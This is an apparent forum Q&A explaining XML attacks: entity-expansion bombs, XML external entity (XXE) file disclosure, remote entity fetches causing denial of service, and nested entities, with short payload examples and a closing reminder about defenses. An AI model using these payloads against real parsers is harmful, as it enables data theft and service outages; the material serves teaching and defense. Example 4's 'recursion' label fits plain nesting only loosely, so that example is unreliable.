xml vulnerabilities

xml has been the backbone of the service oriented application(SOA) and it will be a useful one in the coming future. As xml is easy , flexible, it can be easily made开发者_StackOverflow社区 vulnerable and the attackers can use it for their own purpose. As such some of the attacks by are coercive parsing attack, xml external entity(XEE) attack, xml dos(xdos) attack, xml bombs.

can any one tell in detail about these attacks.

how could one can simulate these attacks practically in a single system?

---

First we need to distinguish the effect of attack from the feature that is exploited.

Particular features of XML that can be exploited are

• XML entities
• Proprietary extension of parser and validator
• Cyclic/recursive references
• Remote access

The effects can be either

• DOS
• Information disclosure

I don't think there is percise definition of a "bomb", but it refers to an attack that is particularly "compact" and which "expands". A "coercive parsing attack" exploits the nature of the XML model to overwhelm the parser.

The examples below are taken from XML Denial of Service Attacks and Defenses. Also, if you understand french, read the excellent magazine "La security des web services".

Example 1

A bomb using entities which result in a DOS because it exhausts the memory

<?xml version="1.0"?>
<!DOCTYPE kaboom [
  <!ENTITY a "aaaaaaaaaaaaaaaaaa...">
]>
<kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>

If you have 50'000 "aaaa...aaa" and 50'0000 &a:&a;...&a;, a payload of 200KB expands to more than 2GB in memory

Example 2

An entity could be used to access another file in a unauthorized way. This leads to information disclosure.

<?xml version="1.0"?>
<!DOCTYPE letter [
     <!ENTITY file SYSTEM "/sensitive.txt" >
]>
<tag> &file; </tag>

Example 3

Using the ability of certain parser to access remote resources (see http://www.ibm.com/developerworks/xml/library/x-tipgentity.html), now go figure what happens if the file bigfile.xml is 2GB. This probably leads to a DOS.

<?xml version="1.0"?>
<!DOCTYPE letter [
     <!ENTITY file  SYSTEM "http://www.mysite.com/bigfile.xml" >
]>
<tag> &file; </tag>

Example 4

This recursion will lead to memory exhaust and probably a DOS.

<!ENTITY companyname "Contoso Inc.">
<!ENTITY divisionname "&companyname; Web Products Division">

If this is schoolwork, then you should also think about how you can protect yourself from such attack.